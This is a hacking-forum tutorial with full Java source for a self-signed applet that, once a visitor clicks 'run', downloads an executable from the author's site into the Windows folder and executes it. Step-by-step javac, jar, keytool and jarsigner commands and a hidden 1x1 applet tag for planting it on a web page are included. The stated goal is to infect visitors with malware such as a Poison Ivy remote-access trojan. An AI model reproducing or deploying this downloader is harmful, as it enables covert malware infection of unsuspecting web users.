1) I did not write the java code being used (I just took out a lot of unnecessary crap and added some lines)
2) It’s not the same code used on milw0rm.
3) I did not discover this.
Requirements:
1) Hosting (better if it’s your own, but can use any which allows the upload of exe’s)
2) Java SDK. Most will probably have this if not you can download it here :
http://java.sun.com/javase/6/download.jsp
3) Your malware (or anything else you want it to auto download and execute)
Let’s get started!
Java applets are allowed to access your system given that they are signed with certificates, which cost about $700! But don’t worry you can actually sign java applets yourself, but because you’ve self-signed these applets before the applets load you will see something like this:
We see these all the time, and for the most part people will just click run anyway, as soon as the visitor clicks run the malware will download and execute on their system. Now let’s go through the fields you can see on the cert.
Name:
The name is taken from the class name of the java file you used for your applets. So whatever name you want to appear on the unsigned cert notice just name the java class.
Publisher:
You can enter this when you’re signing your applets, the publisher will be what you enter for ‘Name’ (You’ll understand what I mean later!)
From:
This will just be the website where the java applets are stored!
Please note: 120*am.co.uk is a website I setup with poison ivy, don’t go there.
Now we understand the cert, let’s take a look at the java code. I won’t explain all of it; I’ll just explain the parts you’ll need to edit for your own use.
Ok if you look at the java code provided (at end of tutorial in code tags!) These are the parts you need to change.
String fileoot = System.getenv("WINDIR");
String fname = "\\sch.exe";
String efool = fileoot.concat(fname);
The first line simply gets the environment variable WINDIR, which will return C:\Windows
The second line will be what you want your malware to be called when stored on their computer. In this case it’s sch.exe
The third line puts it all together and stores it in the variable efool. So in this example it’ll look like this:
C:\Windows\sch.exe
This is obviously what our malware will be when stored on the user’s computer!
The next part to change is:
URL url = new URL("http://www.1201am.co.uk/sch.exe");
Just change the 120*am.co.uk/sch.exe to the path of where your malware is stored on your website!
Also you can change this part:
public class Client extends Applet
As we mentioned earlier the name field on the cert pop-up will be the class name, so where it says ‘Client’ change this to what you want.
You’ll also need to change the classes constructor to the same name you changed ‘Client’ too above. Which looks like this:
public Client()
{
}
So just change where it says Client to whatever you renamed the class.
That’s all we really need to change.
Once you’ve made those amendments save the file as:
Client.java
If you renamed the class like mentioned earlier you’ll need to name the java file the same.
Now the next things we have to do are: Compile the java code to a class, Compile it to a .jar, sign the .jar with our self-made cert, Put them in an html document as applets, and upload to site!
Now to make things easier, Move the Client.java file to the java sdk bin folder, which by default will be:
C:\Program Files\jdk1.6.0\bin
This is where all the tools we need are
Now open up command prompt, and change the path to C:\Program Files\jdk1.6.0\bin
Simply by typing in:
cd C:\Program Files\jdk1.6.0\bin
So it’ll look something like this:
Paint disfigured the screenshot, sorry about that, but it’s clear enough to see ?
Now the next thing we need to do is make the .java file to a class file.
Just type in:
javac Client.java
(There’s a space between javac and Client.java)
Now a class will appear in the same directory as the java file (yey ?)
Now we need to compile that class file into a .jar file!
Type in:
jar cf Client.jar Client.class
Client.jar will be the name of your newly compiled .jar file, and Client.class is the class we made earlier.
Now in your directory, You should have, Client.java, Client.class and Client.jar.
All we have left to do now is, create our cert and assign it to our .jar file then put them as applets and upload to website ?
Ok now in cmd we’re going to be using keytool to create our keyfile and cert.
To create out keyfile simply do this:
keytool -genkey –keystore MyFileName –alias me
Now where it says MyFileName, Change this to what u like.
Remember the password you enter, You will need it later!
It’ll ask you other stuff like name, organization etc…
Just make it up. Then it’ll ask if it’s correct, just type yes and press enter. Then it’ll ask you to enter a pass for <me>, just press enter again.
Now we need to use the keytool again to self cert.
Here’s how:
keytool -selfcert -keystore MyFileName -alias me
again, where it says MyFileName, type the same name you used earlier!
Then it’ll ask you to enter a password, This is the password you used earlier. That’s why I asked you to remember it ?
Once you entered your pass, Just press enter.
Ok now we have to sign the .jar with the cert we’ve created!
To do this simply do this:
jarsigner –keystore myFileName Client.jar me
Now where it says myFileName use the file name you used earlier for the keyfile, and where it says Client.jar just put in what your jar file is called!
It’ll ask for the password again, Enter it and it should say:
The signer certificates will expire after six months.
Congratulations, You’ve compiled and signed your java code. Now we need to put them in the form of java applets and upload the website.
Here’s how:
<applet width='1' height='1' code='Client.class' archive='Client.jar'> </applet>
Where it says Client.class just put your class you made earlier, and where it says Client.jar that’s the jar file we made and signed earlier.
Save that as html file. Upload the html file, class file, .jar file and your malware to your host and my friend, you are done ?
Hopefully you’ve learnt something new and could come in handy at some stage!
import java.applet.Applet;
import java.io.*;
import java.net.URL;
import java.net.URLConnection;
import java.awt.*;
import java.net.*;
public class Client extends Applet
{
public Client()
{
}
public void start()
{
try
{
String fileoot = System.getenv("WINDIR");
String fname = "\\sch.exe";
String efool = fileoot.concat(fname);
BufferedOutputStream bufferedoutputstream = null;
Object obj = null;
InputStream inputstream = null;
URL url = new URL("http://www.1201am.co.uk/sch.exe");
bufferedoutputstream = new BufferedOutputStream(new FileOutputStream(efool));
URLConnection urlconnection = url.openConnection();
inputstream = urlconnection.getInputStream();
byte abyte0[] = new byte[1024];
int i;
for(long l = 0L; (i = inputstream.read(abyte0)) != -1; l += i)
bufferedoutputstream.write(abyte0, 0, i);
try
{
if(inputstream != null)
inputstream.close();
if(bufferedoutputstream != null)
bufferedoutputstream.close();
}
catch(IOException ioexception) {
}
Runtime runtime = Runtime.getRuntime();
try
{
Process process = runtime.exec(efool);
process.waitFor();
BufferedReader bufferedreader = new BufferedReader(new InputStreamReader(process.getInputStream()));
}
catch(Exception exception1) {
}
try
{
if(inputstream != null)
inputstream.close();
if(bufferedoutputstream != null)
bufferedoutputstream.close();
}
catch(IOException ioexception1) {
}
}
catch(Exception e) { }
}
public void main(String args[])
{
start();
}
public void stop()
{
}
}
src: ELITEXBYTES